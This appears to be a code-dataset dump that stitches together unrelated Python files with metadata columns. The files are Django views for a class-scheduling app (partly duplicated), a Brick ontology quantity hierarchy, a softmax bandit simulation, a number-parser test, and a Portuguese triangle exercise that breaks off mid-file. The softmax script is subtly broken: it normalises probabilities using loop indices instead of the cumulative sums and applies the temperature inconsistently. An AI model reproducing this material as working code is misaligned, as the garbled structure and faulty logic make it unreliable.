def is_ajax(request: HttpRequest) -> bool:
return request.META.get('HTTP_X_REQUESTED_WITH', '').lower() == 'xmlhttprequest'
def delete_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass delete of conflicts"""
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
checks = request.POST.getlist('checks[]')
Lesson.objects.filter(id__in=checks).delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
context = generate_full_index_context()
return render(request, 'index.html', context=context)
def edit_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass edit of conflicts"""
if request.method == 'POST':
form = MassEditForm(request.POST)
if form.is_valid():
changes = {}
past_conflicts = list(Conflict.objects.all())
if form.cleaned_data['lesson_name']:
changes['name'] = form.cleaned_data['lesson_name']
if form.cleaned_data['professor']:
professor = form.cleaned_data['professor'].strip().split()
changes['professor'] = get_professor(professor[0], professor[1])
if form.cleaned_data['room']:
changes['room'] = get_room(form.cleaned_data['room'])
if form.cleaned_data['group']:
changes['group'] = get_group(form.cleaned_data['group'])
if form.cleaned_data['start_time']:
changes['start_time'] = form.cleaned_data['start_time']
if form.cleaned_data['end_time']:
changes['end_time'] = form.cleaned_data['end_time']
checks = request.POST.getlist('checks[]')
if changes != {}:
lessons = Lesson.objects.filter(id__in=checks)
lessons.update(**changes)
db_conflicts()
context_after_edit = generate_full_index_context()
current_conflicts = list(context_after_edit['conflicts'])
context_after_edit.update(
generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context_after_edit)
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context.update({'form': form})
return render(request, 'index.html', context=context)
return index(request)
def professors(request: HttpRequest) -> HttpResponse:
"""Render the professors page"""
professors_list = Professor.objects.all()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
if request.method == 'POST':
if 'choose' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
email = professor.email
if not email:
email = "Noemail"
context = {'professors': professors_list, 'form': form, 'email': email}
elif 'save' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
email = request.POST.get('email')
professor = form.cleaned_data['professor']
try:
professor_with_email = Professor.objects.get(email=email)
if professor != professor_with_email:
context = {'professors': professors_list, 'form': form, 'email': email,
'inform': "This email is already in use"}
else:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
except Professor.DoesNotExist:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
else:
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors.html", context)
def export(request: HttpRequest) -> HttpResponse:
"""Render the export page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = ExportForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form, "export": True})
if form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "csv":
temp_file = export_to_csv(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.csv'
elif form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "excel":
temp_file = export_to_excel(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.xlsx'
else:
return render(request, 'popup.html', context={"form": form, "export": True})
wrapper = FileWrapper(temp_file)
response = HttpResponse(wrapper, content_type='application/vnd.ms-excel')
response['Content-Disposition'] = 'attachment; filename=' + file_name
return response
return render(request, 'popup.html', context={"form": form, "export": True})
form = ExportForm()
return render(request, 'popup.html', context={"form": form, "export": True})
def view_students(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
group_students_query = Student.objects.filter(group=group)
students = [(q.index, q.name, q.surname) for q in group_students_query]
context = {
'form': form,
'students': students,
'group': group.name
}
return render(request, "students.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "students.html", context={'form': SelectGroupForm()})
| """Views gathering point"""
import os.path
from datetime import datetime
from wsgiref.util import FileWrapper
import pandas as pd
from django.contrib.auth import authenticate, login as log
from django.core.files.storage import default_storage
from django.conf import settings
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.template import loader
from django.utils.datastructures import MultiValueDictKeyError
from xlrd import XLRDError
import scheduler.import_handlers as imp
from scheduler.calendar_util import get_start_date, generate_conflicts_context, \
generate_full_schedule_context, generate_full_index_context_with_date, get_group_colors, \
get_rooms_colors, generate_full_index_context, generate_context_for_conflicts_report
from scheduler.conflicts_checker import db_conflicts, conflicts_diff
from scheduler.model_util import get_professor, get_room, get_group
from scheduler.models import Room, Lesson, Group, Conflict, Professor, Student
from scheduler.export_handlers import export_to_csv, export_to_excel
from .forms import SelectRoomForm, SelectProfessorForm, SelectGroupForm, \
EditForm, MassEditForm, LoginForm, ExportForm
def login(request: HttpRequest) -> HttpResponse:
"""Render the login page"""
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['login']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
if user.is_superuser:
log(request, user)
# Redirect to a success page.
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
context = {'error': "Incorrect login or password", 'form': form}
return render(request, 'login.html', context)
return render(request, 'login.html', context={"form": form})
context = {'form': LoginForm()}
return render(request, 'login.html', context)
def index(request: HttpRequest) -> HttpResponse:
"""Render the main page"""
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context['form'] = MassEditForm()
return render(request, 'index.html', context)
def index_specific(_request: HttpRequest, date: str) -> HttpResponse:
"""Render the main page with given date"""
date_as_datetime = datetime.strptime(date, '%Y-%m-%d')
context = generate_full_index_context_with_date(date_as_datetime)
form = MassEditForm()
context.update({'form': form})
return render(_request, 'index.html', context)
def upload_schedule(request: HttpRequest) -> HttpResponse:
"""Render schedule upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
data = pd.read_csv(file.name)
elif ext == '.xlsx':
data = pd.read_excel(file.name)
else:
return render(request, "upload_schedule.html",
{'error': "Error: Extension not supported"})
added_lessons, incorrect, duplicate = imp.parse_data(data, ext)
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
context = {'loaded_data': data_html, 'added': added_lessons}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_schedule.html", context)
def upload_students(request: HttpRequest) -> HttpResponse:
"""Render students upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
data = pd.read_csv(file.name)
elif ext == '.xlsx':
data = pd.read_excel(file.name)
else:
return render(request, "upload_students.html",
{'error': "Error: Extension not supported"})
added_lessons, incorrect, duplicate = imp.import_students(data)
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
context = {'loaded_data': data_html, 'added': added_lessons}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_students.html", context)
def show_conflicts(request: HttpRequest) -> HttpResponse:
"""Render the conflicts page"""
template = loader.get_template('conflicts.html')
context = generate_conflicts_context()
return HttpResponse(template.render(context, request))
def show_rooms_schedule(request: HttpRequest) -> HttpResponse:
"""Render the room schedule page"""
if request.method == 'POST':
form = SelectRoomForm(request.POST)
if form.is_valid():
room = form.cleaned_data['room']
room_number = room.number
room_lessons_query = Lesson.objects.filter(room=room)
room_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
room_number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in room_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(room_lessons_list),
'type': 'room',
'name': room_number,
'events': room_lessons_list,
'start_date': get_start_date(room_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "room_schedule.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "room_schedule.html", context={'form': SelectRoomForm()})
def show_professors_schedule(request: HttpRequest) -> HttpResponse:
"""Render the professor schedule page"""
if request.method == 'POST':
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
professors_lessons_query = Lesson.objects.filter(professor=professor)
professors_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
Room.objects.filter(id=q.room_id)[:1]
.get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in professors_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(professors_lessons_list),
'events': professors_lessons_list,
'type': 'professor',
'name': professor,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(professors_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "professors_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors_scheduler.html", context={'form': SelectProfessorForm()})
def show_groups_schedule(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
groups_lessons_query = Lesson.objects.filter(group=group)
groups_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
group,
Room.objects.filter(id=q.room_id)[:1].get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in groups_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(groups_lessons_list),
'events': groups_lessons_list,
'type': 'group',
'name': group,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(groups_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "groups_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "groups_scheduler.html", context={'form': SelectGroupForm()})
def show_schedule(request: HttpRequest) -> HttpResponse:
"""Render the schedule page"""
context = generate_full_schedule_context()
return render(request, "full_schedule.html", context)
def edit(request: HttpRequest, lesson_id) -> HttpResponse:
"""Render the edit page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=form.cleaned_data['id'])
lesson.name = form.cleaned_data['name']
professor = form.cleaned_data['professor'].strip().split()
lesson.professor = get_professor(professor[0], professor[1])
lesson.room = get_room(form.cleaned_data['room'])
lesson.group = get_group(form.cleaned_data['group'])
lesson.start_time = form.cleaned_data['start_time']
lesson.end_time = form.cleaned_data['end_time']
lesson.save()
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
lesson = Lesson.objects.get(id=lesson_id)
form = EditForm(
initial={'id': lesson.id, 'name': lesson.name, 'professor': lesson.professor,
'room': lesson.room, 'group': lesson.group,
'start_time': lesson.start_time, 'end_time': lesson.end_time})
return render(request, 'popup.html', context={"form": form})
def create(request: HttpRequest) -> HttpResponse:
"""Render the create page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
past_conflicts = list(Conflict.objects.all())
professor = form.cleaned_data['professor'].strip().split()
professor = get_professor(professor[0], professor[1])
room = get_room(form.cleaned_data['room'])
group = get_group(form.cleaned_data['group'])
Lesson.objects.get_or_create(
name=form.cleaned_data['name'],
professor=professor,
room=room,
group=group,
start_time=form.cleaned_data['start_time'],
end_time=form.cleaned_data['end_time']
)
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
return render(request, 'popup.html', context={"form": EditForm()})
def remove(request: HttpRequest, lesson_id) -> HttpResponse:
"""Remove event and redirect to index page"""
try:
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=lesson_id)
lesson.delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return redirect('/calendar/')
except Lesson.DoesNotExist:
return redirect('/calendar/')
def is_ajax(request: HttpRequest) -> bool:
return request.META.get('HTTP_X_REQUESTED_WITH', '').lower() == 'xmlhttprequest'
def delete_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass delete of conflicts"""
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
checks = request.POST.getlist('checks[]')
Lesson.objects.filter(id__in=checks).delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
context = generate_full_index_context()
return render(request, 'index.html', context=context)
def edit_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass edit of conflicts"""
if request.method == 'POST':
form = MassEditForm(request.POST)
if form.is_valid():
changes = {}
past_conflicts = list(Conflict.objects.all())
if form.cleaned_data['lesson_name']:
changes['name'] = form.cleaned_data['lesson_name']
if form.cleaned_data['professor']:
professor = form.cleaned_data['professor'].strip().split()
changes['professor'] = get_professor(professor[0], professor[1])
if form.cleaned_data['room']:
changes['room'] = get_room(form.cleaned_data['room'])
if form.cleaned_data['group']:
changes['group'] = get_group(form.cleaned_data['group'])
if form.cleaned_data['start_time']:
changes['start_time'] = form.cleaned_data['start_time']
if form.cleaned_data['end_time']:
changes['end_time'] = form.cleaned_data['end_time']
checks = request.POST.getlist('checks[]')
if changes != {}:
lessons = Lesson.objects.filter(id__in=checks)
lessons.update(**changes)
db_conflicts()
context_after_edit = generate_full_index_context()
current_conflicts = list(context_after_edit['conflicts'])
context_after_edit.update(
generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context_after_edit)
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context.update({'form': form})
return render(request, 'index.html', context=context)
return index(request)
def professors(request: HttpRequest) -> HttpResponse:
"""Render the professors page"""
professors_list = Professor.objects.all()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
if request.method == 'POST':
if 'choose' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
email = professor.email
if not email:
email = "Noemail"
context = {'professors': professors_list, 'form': form, 'email': email}
elif 'save' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
email = request.POST.get('email')
professor = form.cleaned_data['professor']
try:
professor_with_email = Professor.objects.get(email=email)
if professor != professor_with_email:
context = {'professors': professors_list, 'form': form, 'email': email,
'inform': "This email is already in use"}
else:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
except Professor.DoesNotExist:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
else:
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors.html", context)
def export(request: HttpRequest) -> HttpResponse:
"""Render the export page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = ExportForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form, "export": True})
if form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "csv":
temp_file = export_to_csv(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.csv'
elif form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "excel":
temp_file = export_to_excel(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.xlsx'
else:
return render(request, 'popup.html', context={"form": form, "export": True})
wrapper = FileWrapper(temp_file)
response = HttpResponse(wrapper, content_type='application/vnd.ms-excel')
response['Content-Disposition'] = 'attachment; filename=' + file_name
return response
return render(request, 'popup.html', context={"form": form, "export": True})
form = ExportForm()
return render(request, 'popup.html', context={"form": form, "export": True})
def view_students(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
group_students_query = Student.objects.filter(group=group)
students = [(q.index, q.name, q.surname) for q in group_students_query]
context = {
'form': form,
'students': students,
'group': group.name
}
return render(request, "students.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "students.html", context={'form': SelectGroupForm()}) | en | 0.693977 | Views gathering point Render the login page # Redirect to a success page. Render the main page Render the main page with given date Render schedule upload page Render students upload page Render the conflicts page Render the room schedule page Render the professor schedule page Render the group schedule page Render the schedule page Render the edit page Render the create page Remove event and redirect to index page Logic for mass delete of conflicts Logic for mass edit of conflicts Render the professors page Render the export page Render the group schedule page | 1.973503 | 2 |
quantities.py | shreyasnagare/brick-owl-dl | 0 | 6616838 | <filename>quantities.py
from rdflib import Graph, Literal, BNode, Namespace, RDF, URIRef
from rdflib.collection import Collection
from rdflib.extras.infixowl import Restriction
from namespaces import *
quantity_definitions = {
"Quantity": {
"subclasses": {
"Air_Quality": {
"subclasses": {
"CO2_Level": {},
"PM10_Level": {},
"PM25_Level": {},
"TVOC_Level": {},
},
},
"Conductivity": {},
"Capacity": {},
"Enthalpy": {},
"Grains": {},
"Power": {
"subclasses": {
"Electric_Power": {
"subclasses": {
"Apparent_Power": {},
"Active_Power": {
OWL.equivalentClass: "Real_Power",
},
"Reactive_Power": {},
"Complex_Power": {},
},
},
"Thermal_Power": {}
},
},
"Cloudage": {},
"Current": {
"subclasses": {
"Electric_Current": {
"subclasses": {
"Current_Angle": {},
"Current_Magnitude": {},
"Current_Imbalance": {},
"Current_Total_Harmonic_Distortion": {},
"Alternating_Current_Frequency": {},
},
},
},
},
"Voltage": {
"subclasses": {
"Electric_Voltage": {
"subclasses": {
"Voltage_Magnitude": {},
"Voltage_Angle": {},
"Voltage_Imbalance": {},
},
},
},
},
"Daytime": {},
"Dewpoint": {},
"Direction": {
"subclasses": {
"Wind_Direction": {},
},
},
"Energy": {
"subclasses": {
"Electric_Energy": {},
"Thermal_Energy": {},
},
},
"Flow": {},
"Frequency": {
"subclasses": {
"Alternating_Current_Frequency": {},
},
},
"Humidity": {},
"Illuminance": {},
"Irradiance": {
"subclasses": {
"Solar_Irradiance": {},
},
},
"Level": {
"subclasses": {
"CO2_Level": {},
"PM10_Level": {},
"PM25_Level": {},
"TVOC_Level": {},
},
},
"Luminance": {
"subclasses": {
"Luminous_Flux": {},
"Luminous_Intensity": {},
},
},
"Power_Factor": {},
"Precipitation": {},
"Pressure": {
"subclasses": {
"Atmospheric_Pressure": {},
"Static_Pressure": {},
},
},
"Speed": {
"subclasses": {
"Wind_Speed": {},
},
},
"Temperature": {
"subclasses": {
"Operative_Temperature": {},
"Radiant_Temperature": {},
"Dry_Bulb_Temperature": {},
"Wet_Bulb_Temperature": {},
},
},
"Weather_Condition": {
},
},
},
}
| <filename>quantities.py
from rdflib import Graph, Literal, BNode, Namespace, RDF, URIRef
from rdflib.collection import Collection
from rdflib.extras.infixowl import Restriction
from namespaces import *
quantity_definitions = {
"Quantity": {
"subclasses": {
"Air_Quality": {
"subclasses": {
"CO2_Level": {},
"PM10_Level": {},
"PM25_Level": {},
"TVOC_Level": {},
},
},
"Conductivity": {},
"Capacity": {},
"Enthalpy": {},
"Grains": {},
"Power": {
"subclasses": {
"Electric_Power": {
"subclasses": {
"Apparent_Power": {},
"Active_Power": {
OWL.equivalentClass: "Real_Power",
},
"Reactive_Power": {},
"Complex_Power": {},
},
},
"Thermal_Power": {}
},
},
"Cloudage": {},
"Current": {
"subclasses": {
"Electric_Current": {
"subclasses": {
"Current_Angle": {},
"Current_Magnitude": {},
"Current_Imbalance": {},
"Current_Total_Harmonic_Distortion": {},
"Alternating_Current_Frequency": {},
},
},
},
},
"Voltage": {
"subclasses": {
"Electric_Voltage": {
"subclasses": {
"Voltage_Magnitude": {},
"Voltage_Angle": {},
"Voltage_Imbalance": {},
},
},
},
},
"Daytime": {},
"Dewpoint": {},
"Direction": {
"subclasses": {
"Wind_Direction": {},
},
},
"Energy": {
"subclasses": {
"Electric_Energy": {},
"Thermal_Energy": {},
},
},
"Flow": {},
"Frequency": {
"subclasses": {
"Alternating_Current_Frequency": {},
},
},
"Humidity": {},
"Illuminance": {},
"Irradiance": {
"subclasses": {
"Solar_Irradiance": {},
},
},
"Level": {
"subclasses": {
"CO2_Level": {},
"PM10_Level": {},
"PM25_Level": {},
"TVOC_Level": {},
},
},
"Luminance": {
"subclasses": {
"Luminous_Flux": {},
"Luminous_Intensity": {},
},
},
"Power_Factor": {},
"Precipitation": {},
"Pressure": {
"subclasses": {
"Atmospheric_Pressure": {},
"Static_Pressure": {},
},
},
"Speed": {
"subclasses": {
"Wind_Speed": {},
},
},
"Temperature": {
"subclasses": {
"Operative_Temperature": {},
"Radiant_Temperature": {},
"Dry_Bulb_Temperature": {},
"Wet_Bulb_Temperature": {},
},
},
"Weather_Condition": {
},
},
},
}
| none | 1 | 2.112304 | 2 | |
softmax.py | gavinsyw/BanditAlgorithm | 2 | 6616839 | import numpy as np
from matplotlib import pyplot
from env import StochasticMAB
import math
# Supported random type: Gaussian, Uniform, Bernoulli, Exponential
def softmax(total_time_slot, arm_num, tau):
bandit_model = StochasticMAB(n_arms=arm_num, random_type="Gaussian")
ave_reward = list() # average reward for each arm
roll_time = list() # roll time for each arm
total_reward = [0] # current total reward, recorded at each time slot
# roll each arm once first
for i in range(arm_num):
this_reward = bandit_model.roll(i)
ave_reward.append(this_reward)
roll_time.append(1)
total_reward.append(total_reward[-1] + this_reward)
for i in range(total_time_slot - arm_num):
p_arm_list = [math.exp(ave_reward[0])]
for j in range(1, arm_num):
p_arm = math.exp(ave_reward[j]/tau)+p_arm_list[-1]
p_arm_list.append(p_arm)
p_arm_list = [k / p_arm_list[-1] for k in range(arm_num)]
arm = -1
r = np.random.random_sample()
for j in range(arm_num-1):
if r >= p_arm_list[j] and r < p_arm_list[j+1]:
arm = j
break
if arm == -1:
arm = arm_num - 1
this_reward = bandit_model.roll(arm)
ave_reward[arm] = (ave_reward[arm] * roll_time[arm] + this_reward) / (roll_time[arm] + 1)
roll_time[arm] += 1
total_reward.append(total_reward[-1] + this_reward)
max_reward = bandit_model.max_expectation()
regret = [i*max_reward-total_reward[i] for i in range(total_time_slot+1)]
return ave_reward, roll_time, total_reward, regret
if __name__ == '__main__':
a_reward, r_time, sum_reward, cumulative_regret = softmax(total_time_slot=10000, arm_num=10, tau=0.7)
t = [100*i for i in range(1, 100)]
reward_t = [sum_reward[100*i] for i in range(1, 100)]
regret_t = [cumulative_regret[100*i] for i in range(1, 100)]
pyplot.plot(t, reward_t)
pyplot.plot(t, regret_t)
pyplot.show()
| import numpy as np
from matplotlib import pyplot
from env import StochasticMAB
import math
# Supported random type: Gaussian, Uniform, Bernoulli, Exponential
def softmax(total_time_slot, arm_num, tau):
bandit_model = StochasticMAB(n_arms=arm_num, random_type="Gaussian")
ave_reward = list() # average reward for each arm
roll_time = list() # roll time for each arm
total_reward = [0] # current total reward, recorded at each time slot
# roll each arm once first
for i in range(arm_num):
this_reward = bandit_model.roll(i)
ave_reward.append(this_reward)
roll_time.append(1)
total_reward.append(total_reward[-1] + this_reward)
for i in range(total_time_slot - arm_num):
p_arm_list = [math.exp(ave_reward[0])]
for j in range(1, arm_num):
p_arm = math.exp(ave_reward[j]/tau)+p_arm_list[-1]
p_arm_list.append(p_arm)
p_arm_list = [k / p_arm_list[-1] for k in range(arm_num)]
arm = -1
r = np.random.random_sample()
for j in range(arm_num-1):
if r >= p_arm_list[j] and r < p_arm_list[j+1]:
arm = j
break
if arm == -1:
arm = arm_num - 1
this_reward = bandit_model.roll(arm)
ave_reward[arm] = (ave_reward[arm] * roll_time[arm] + this_reward) / (roll_time[arm] + 1)
roll_time[arm] += 1
total_reward.append(total_reward[-1] + this_reward)
max_reward = bandit_model.max_expectation()
regret = [i*max_reward-total_reward[i] for i in range(total_time_slot+1)]
return ave_reward, roll_time, total_reward, regret
if __name__ == '__main__':
a_reward, r_time, sum_reward, cumulative_regret = softmax(total_time_slot=10000, arm_num=10, tau=0.7)
t = [100*i for i in range(1, 100)]
reward_t = [sum_reward[100*i] for i in range(1, 100)]
regret_t = [cumulative_regret[100*i] for i in range(1, 100)]
pyplot.plot(t, reward_t)
pyplot.plot(t, regret_t)
pyplot.show()
| en | 0.836972 | # Supported random type: Gaussian, Uniform, Bernoulli, Exponential # average reward for each arm # roll time for each arm # current total reward, recorded at each time slot # roll each arm once first | 2.776174 | 3 |
tests/test_number_parsing.py | noviluni/number-parser | 0 | 6616840 | <reponame>noviluni/number-parser
import pytest
from number_parser import parse
LANG = 'en'
class TestNumberParser():
@pytest.mark.parametrize(
"test_input,expected",
[
("OnE DaY at a Time.", "1 DaY at a Time."),
("SeVentY THREE days of SUMMER!!!.", "73 days of SUMMER!!!."),
("Twelve 11 pm", "12 11 pm"),
]
)
def test_parse_case_of_string(self, expected, test_input):
assert parse(test_input, LANG) == expected
| import pytest
from number_parser import parse
LANG = 'en'
class TestNumberParser():
@pytest.mark.parametrize(
"test_input,expected",
[
("OnE DaY at a Time.", "1 DaY at a Time."),
("SeVentY THREE days of SUMMER!!!.", "73 days of SUMMER!!!."),
("Twelve 11 pm", "12 11 pm"),
]
)
def test_parse_case_of_string(self, expected, test_input):
assert parse(test_input, LANG) == expected | none | 1 | 3.057174 | 3 | |
Curso_Em_Video_Python/ex042.py | ThallesTorres/Curso_Em_Video_Python | 0 | 6616841 | # Ex: 042 - Refaça o DESAFIO 035 dos triângulos, acrescentando o recurso de
# mostrar que tipo de triângulo será formado: Equilátero - Todos os lados
# iguais, Isósceles - Dois lados iguais, Escaleno - Todos os lados diferentes.
print('''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Seja bem-vindo!
--Exercício 042
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
''')
print('--Preencha os Dados ')
m1 = float(input('1° Medida do triângulo: '))
m2 = float(input('2° Medida do triângulo: '))
m3 = float(input('3° Medida do triângulo: '))
print('')
if m1 == m2 == m3:
n = 'EQUILÁTERO'
print(f'De acordo com as medidas informadas, seu triângulo é {n}')
elif (m1 + m2) <= m3 or (m1 + m3) <= m2 or (m2 + m3) <= m1:
print('De acordo com as medidas informadas, é impossivel formar um triângulo.')
elif m1 == m2 or m1 == m3 or m2 == m3:
n = 'ISÓSCELES'
print(f'De acordo com as medidas informadas, seu triângulo é {n}')
else:
n = 'ESCALENO'
print(f'De acordo com as medidas informadas, seu triângulo é {n}')
print('''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Obrigado pelo uso!
--Desenvolvido por <NAME>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-''')
| # Ex: 042 - Refaça o DESAFIO 035 dos triângulos, acrescentando o recurso de
# mostrar que tipo de triângulo será formado: Equilátero - Todos os lados
# iguais, Isósceles - Dois lados iguais, Escaleno - Todos os lados diferentes.
print('''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Seja bem-vindo!
--Exercício 042
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
''')
print('--Preencha os Dados ')
m1 = float(input('1° Medida do triângulo: '))
m2 = float(input('2° Medida do triângulo: '))
m3 = float(input('3° Medida do triângulo: '))
print('')
if m1 == m2 == m3:
n = 'EQUILÁTERO'
print(f'De acordo com as medidas informadas, seu triângulo é {n}')
elif (m1 + m2) <= m3 or (m1 + m3) <= m2 or (m2 + m3) <= m1:
print('De acordo com as medidas informadas, é impossivel formar um triângulo.')
